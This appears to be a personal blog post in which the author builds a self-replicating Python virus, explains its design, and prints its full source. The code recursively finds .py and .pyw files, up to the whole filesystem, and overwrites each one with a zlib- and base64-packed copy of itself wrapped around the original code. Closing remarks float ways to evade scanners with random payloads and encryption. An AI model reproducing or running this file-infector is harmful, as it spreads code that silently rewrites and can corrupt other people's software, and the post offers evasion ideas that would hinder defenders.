So I was sitting in a long and irrelevant meeting the other day and my thoughts started flickering in other directions. One question that came to mind was:

How hard will it be to write a self replicating virus in python. Not very hard, it turns out!

The idea

Ok so the idea was lit, and I found my good old trusty vim editor (actually Neovim these days) and started coding away.

I wanted it to have the following features:

  • Self-replicating by injecting itself into other python files on the system
  • Some sort of packing mechanism to make the code less obvious
  • The ability to still run the actual code of the original script (e.g. if the virus code is actually doing something bad in the background)
  • Potentially infect an entire system.

Putting it all together

For the first part I decided to go with an easy method of adding some markers in my code using simple begin and end tags: # MALPYIN and # MALPYOUT

I could then just read the currently running python script, check the lines for where the code begins, and then read all of them into memory until I hit the end tag.

Now I can search for all .py and .pyw files in the current directory recursively (or potentially from the root of the file system). Turns out that searching the file system for multiple file extensions can be a bit tricky if you do not want to go over the entire system multiple time. I did find a solution that mostly work, but I am not 100% happy with it.

Finally, I needed a way to pack it. After some trial and error, I decided to go with a mix of zlib compression and base64 encoding. It makes it quite hard to read and if it weren’t for the begin/end tags, it would also somewhat add a bit of polymorphism to the whole thing (making it harder to make scripts to look for infected files).

In the end there were some details like not infecting already infected files, not packing the code multiple times, etc. that made the code grow a bit. These could be removed if I had not decided on the full feature set above.

The final code

Without further ado, this is the final code. I am sure it can be made simpler/prettier/whatever by folks that do a lot of python coding and know how to optimize things.

You can set the GLOBAL to True, if you want it to infect all python files on your system (I do NOT recommend that) or else it will just go for the files in the folder where you ran it first. If you run any of the infected python scripts, they will try to infect other scripts as well, so please be sure you know what to do.

If you have any ideas, do let me know in the comments below.

# MALPYIN

# do we want to infect the entire filesystem?
GLOBAL = False

import os
import sys
from pathlib import Path
import re
import base64
import zlib

def packer(vsrc, osrc):
    """
    Really simple packer that gzip the virus source and original src
    and finally, base64 encode them.
    """
    vcomp = base64.b64encode(zlib.compress(vsrc.encode('utf-8'))).decode('utf-8')
    ocomp = base64.b64encode(zlib.compress(osrc.encode('utf-8'))).decode('utf-8')
    return f'# MALPYIN\n\nimport zlib,base64;\nexec(zlib.decompress(base64.b64decode("{vcomp}")));\n# MALPYOUT\n\nexec(zlib.decompress(base64.b64decode("{ocomp}")))'


# open the current file itself to copy the malware code (there might be other code)
malcode = []
with open(sys.argv[0], 'r') as f:
    lines = f.readlines()

found_malcode = False
for line in lines:
    if found_malcode:
        malcode.append(line)
    if line == "# MALPYIN\n":
        found_malcode = True
        continue
    if line == "# MALPYOUT\n":
        break

# unpack the malware code
if re.search(r'^exec\(\)', str(malcode)):
    print("found secondary infection")
    malcode_full = re.search(r'^exec.+\{(.*)\}',str(malcode))
    icode = zlib.decompress(base64.b64decode(malcode_full.group()))
    malcode.append(str(icode) +'\n')

# only infect files as configured for
if GLOBAL==True:
    fs_root = os.path.abspath('.').split(os.path.sep)[0]+os.path.sep
else:
    fs_root = '.'

# find all python files to infect
files = (p.resolve() for p in Path(fs_root).glob("**/*") if p.suffix in {".py", ".pyw"})

#infect all files if they are not already infected
for file in files:
    with open(file, 'r') as f:
        org = f.readlines()

    infected = False

    for line in org:
        if line == "# MALPYIN\n":
            infected = True
            break

    if not infected:
        with open(file, 'w') as f:
            f.writelines(packer(''.join(malcode),''.join(org)))

def malpy():
    print("If I were EV1L I would have D3S7R0Y3D your system here")

malpy()

# MALPYOUT

Limitations and further ideas

So the code will only run with python3 and it will not be able to detect if it infects a python2 script (who has this old crap anyways?).

On Windows it only infect files on the current filesystem (e.g. c:\). This is probably good enough anyways.

The GLOBAL flag could be moved to an environment variable or similar. This could make it safe for you, but not for other systems.

I considered adding some sort of random payload to the packed data. This would make it even harder to detect by scanners. It could also be used as markers where they were maybe encrypted with some key that was part of the code. Haven’t fully figured out how that would work for huge systems where it would have to do a lot of decryption in order to find already infected files.